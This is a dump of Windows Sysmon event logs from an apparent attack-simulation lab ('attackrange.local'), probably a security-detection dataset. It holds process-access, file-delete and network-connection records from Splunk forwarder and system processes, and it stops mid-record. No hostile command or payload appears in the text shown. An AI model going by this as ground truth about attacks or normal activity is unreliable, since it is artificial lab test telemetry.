07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103456Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103455Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103454Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103453Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103452Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103451Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103450Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103449Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103448Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103447Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103446Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103445Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103444Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103443Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103442Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103441Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103440Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103439Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103438Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103437Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103436Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103435Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103434Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103433Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.826{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D49F16A8C24F8B885C119CABA2E8C653,SHA256=6418B6074FCDE1B63F6FCE7D6DCF63845B875E2E851147CC0B4153A3B3D48615,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081310Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:25.242{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F0A20DF3A70B931BE2E8BADAFF3B723,SHA256=56B5535A782FD85EDCD3C88E6105AC2FF089EDF23340BE517B50ECC230A0F015,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081311Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:26.305{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACE0BE46B217AF67AF75711392EE4EC0,SHA256=45DCEF86ED9B9A4DEC83246BBFA4FCEF56ADBEAF7F2F4656171147489D5A700A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103463Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:27.013{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FE68BA600C80C8A7FFD55E398CBFB8F,SHA256=3B3530096EA6E9A27F800BA68392DD2F3FA575EC3B4577D35DD43BA69FA55963,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081313Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:25.701{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50021-false10.0.1.12-8000- 23542300x800000000000000081312Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:27.305{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D0C525456CD15A1725D5BDB48B572FC,SHA256=91F0705DE8D798709C7C2DBCE84BB8A2DB485150750D3E42BD537028C20324B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103464Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:28.263{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CE2023E2321B2D8681188EADE12DCF9,SHA256=881697B01D7124459745891AE861219F2C3F4A158BEE2A08EF6E07CA7550290C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081314Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:28.367{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86AFC83C54CD690CF787E112789B63D5,SHA256=230A9C8E7ABB730DCCDBE24A299F17A103759F069D5596D0BBC37E1182F80C68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103465Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:29.482{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F16B67AA1A62F84A43092020AE9B1BC6,SHA256=97C6B9E926D834A3CC526D1BACDC6BF1A3682575CE1F23C98D881E165D3333ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081316Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:29.633{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081315Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:29.367{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=079E2D4C57FD2D99725035AEDBA5D6CE,SHA256=047709718A25CB83A92448A54C83CA9D8400EC36389D084ED64548F54A92F5A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103466Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:30.482{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1ABA666310FE6289D17775500C9234D,SHA256=BC6D0E00220E4831FD85262B8311F5993D0AB07E0B1BBEA1C491D139F1833ECD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081317Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:30.383{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F478FC0667921B6EA9F93DC8AB9CE928,SHA256=35636AFFEE6745C05FE6154C068B124A095DA3A46D62F09BB53E4C304B30830A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103468Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:29.297{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 